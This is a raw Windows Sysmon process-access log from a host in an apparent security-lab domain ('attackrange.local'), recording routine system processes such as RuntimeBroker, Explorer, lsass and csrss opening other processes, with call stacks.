21:06:47.697{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000022306Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.697{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000022305Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.697{4DB9351A-9F2B-60D3-C400-00000000CF01}7765308C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.Storage.dll+9f28d|C:\Windows\System32\Windows.Storage.dll+2a448d|C:\Windows\System32\Windows.Storage.dll+74783|C:\Windows\System32\Windows.Storage.dll+747fa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000022304Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.697{4DB9351A-9F2B-60D3-C400-00000000CF01}7765308C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.Storage.dll+9f28d|C:\Windows\System32\Windows.Storage.dll+2ca5c2|C:\Windows\System32\Windows.Storage.dll+cb155|C:\Windows\System32\Windows.Storage.dll+74066|C:\Windows\System32\Windows.Storage.dll+2a43ef|C:\Windows\System32\Windows.Storage.dll+74783|C:\Windows\System32\Windows.Storage.dll+747fa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 10341000x800000000000000022303Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.682{4DB9351A-9F2B-60D3-C400-00000000CF01}7765308C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.Storage.dll+9f28d|C:\Windows\System32\Windows.Storage.dll+c6b73|C:\Windows\System32\Windows.Storage.dll+c62e1|C:\Windows\System32\Windows.Storage.dll+c61f5|C:\Windows\System32\Windows.Storage.dll+c618e|C:\Windows\System32\Windows.Storage.dll+11c559|C:\Windows\System32\Windows.Storage.dll+61096|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 10341000x800000000000000022302Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.682{4DB9351A-9F2B-60D3-C400-00000000CF01}7765308C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.Storage.dll+9f28d|C:\Windows\System32\Windows.Storage.dll+c94c3|C:\Windows\System32\Windows.Storage.dll+11c3d0|C:\Windows\System32\Windows.Storage.dll+11c327|C:\Windows\System32\Windows.Storage.dll+11c4f7|C:\Windows\System32\Windows.Storage.dll+61096|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea 10341000x800000000000000022301Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.682{4DB9351A-9F2B-60D3-C400-00000000CF01}7765308C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.Storage.dll+9f28d|C:\Windows\System32\Windows.Storage.dll+cb257|C:\Windows\System32\Windows.Storage.dll+61155|C:\Windows\System32\Windows.Storage.dll+61078|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000022300Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.682{4DB9351A-9F2B-60D3-C400-00000000CF01}7765308C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.Storage.dll+9f28d|C:\Windows\System32\Windows.Storage.dll+61129|C:\Windows\System32\Windows.Storage.dll+61078|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+cc60c 10341000x800000000000000022299Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.682{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.Storage.dll+9f28d|C:\Windows\System32\Windows.Storage.dll+9f408|C:\Windows\System32\Windows.Storage.dll+1a2b29|C:\Windows\System32\Windows.Storage.dll+1a2985|C:\Windows\System32\Windows.Storage.dll+a0166|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022298Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.682{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000022297Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.682{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000022296Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.666{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022295Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.666{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022294Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.666{4DB9351A-9F2C-60D3-D000-00000000CF01}50643656C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022293Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.666{4DB9351A-9F2C-60D3-D000-00000000CF01}50643656C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022292Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.650{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022291Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.650{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022290Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.478{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022289Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.478{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022288Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.478{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.447{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-A267-60D3-FF04-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.432{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A267-60D3-FF04-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 